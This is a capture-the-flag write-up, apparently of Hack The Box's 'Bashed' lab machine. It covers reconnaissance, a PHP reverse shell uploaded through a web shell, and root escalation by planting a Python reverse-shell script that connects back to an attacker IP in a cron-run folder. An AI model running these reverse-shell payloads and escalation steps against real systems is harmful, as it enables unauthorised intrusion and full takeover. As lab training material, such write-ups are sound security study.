HTB Bashed

$nmap -T4 -A -sV -p- 10.10.10.68

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 17:31 CEST
Nmap scan report for 10.10.10.68
Host is up (0.044s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.95 seconds

Access to http://10.10.10.68

$nikto -h 10.10.10.68

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.68
+ Target Hostname:    10.10.10.68
+ Target Port:        80
+ Start Time:         2020-07-16 17:35:41 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 1e3f, size: 55f8bbac32f80, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /php/: Directory indexing found.
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7864 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-07-16 17:42:17 (GMT2) (396 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/16 17:41:19 Starting gobuster
===============================================================
http://10.10.10.68/.hta (Status: 403)
http://10.10.10.68/.htpasswd (Status: 403)
http://10.10.10.68/.htaccess (Status: 403)
http://10.10.10.68/css (Status: 301)
http://10.10.10.68/dev (Status: 301)
http://10.10.10.68/fonts (Status: 301)
http://10.10.10.68/images (Status: 301)
http://10.10.10.68/index.html (Status: 200)
http://10.10.10.68/js (Status: 301)
http://10.10.10.68/php (Status: 301)
http://10.10.10.68/server-status (Status: 403)
http://10.10.10.68/uploads (Status: 301)
===============================================================
2020/07/16 17:41:40 Finished
==============================================================
Web shell

www-data@bashed:/var/www/html/dev# cd /home/
www-data@bashed :/home# ls

arrexel
scriptmanager

www-data@bashed :/home# cd arrexel
www-data@bashed :/home/arrexel# cat user.txt

2c28XXXXXXXXXXXXXXXXXXXXXXXXXXXX

www-data@bashed:/var/www/html/dev# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

The command ​sudo -l​ reveals that the ​www-data​ user can run any command as scriptmanager​.
Running the command ​sudo -u scriptmanager bash -i​ will spawn a bash shell

www-data@bashed:/# ls -la

total 88
drwxr-xr-x 23 root root 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
drwxr-xr-x 2 root root 4096 Dec 4 2017 bin
drwxr-xr-x 3 root root 4096 Dec 4 2017 boot
drwxr-xr-x 19 root root 4240 Jul 16 08:29 dev
drwxr-xr-x 89 root root 4096 Dec 4 2017 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Dec 4 2017 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 110 root root 0 Jul 16 08:29 proc
drwx------ 3 root root 4096 Dec 4 2017 root
drwxr-xr-x 18 root root 500 Jul 16 08:29 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Jul 16 08:53 sys
drwxrwxrwt 10 root root 4096 Jul 16 09:06 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Dec 4 2017 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

www-data@bashed :/# sudo cd scriptmanager

sudo: no tty present and no askpass program specified

www-data@bashed :/# cd scripts
www-data@bashed :/# sudo -u scriptmanager bash

bash: cannot set terminal process group (746): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/$ exit

We need a real shell to be able to run a command like that.
As there is an upload folder we should be able to use a remote shell.

Let’s use our usual http://pentestmonkey.net/tools/php-reverse-shell

$python -m SimpleHTTPServer 8080
$nc -lvnp 1234

Access to http://10.10.10.68/uploads/shell.php

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.68] 39740
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:45:46 up  1:16,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/$ 

Now we have a shell with www-data.

Let’s return to the past command to try to run the command ​sudo -u scriptmanager bash -i​

www-data@bashed:/$ sudo -u scriptmanager bash -i

scriptmanager@bashed:/$    

Here we are scriptmanager user.

scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -a

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:51 test.txt

scriptmanager@bashed:/scripts$ cat test.py

cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

scriptmanager@bashed:/scripts$ ls -la

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:53 test.txt

scriptmanager@bashed:/scripts$ ls -la

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:54 test.txt

According to these results test.py is being executed every minute.
May all the scripts of the folder be executed every minute?

getroot.py
(http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.14",9999));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

scriptmanager@bashed:/scripts$ wget 10.10.14.14:8080/getroot.py

wget 10.10.14.14:8080/getroot.py
--2020-07-18 09:10:36--  http://10.10.14.14:8080/getroot.py
Connecting to 10.10.14.14:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 222 [text/plain]
Saving to: 'getroot.py'

getroot.py          100%[===================>]     222  --.-KB/s    in 0s      

2020-07-18 09:10:36 (33.4 MB/s) - 'getroot.py' saved [222/222]

scriptmanager@bashed:/scripts$ ls -la

total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jul 18 09:10 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  222 Jul 18 09:10 getroot.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 18 09:10 test.txt

$nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.68] 58898
/bin/sh: 0: can't access tty; job control turned off

# whoami

root

# python -c 'import pty; pty.spawn("/bin/bash");'

root@bashed:/scripts# 

root@bashed:/scripts# cd /root
root@bashed:~# cat root.txt

cc4fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *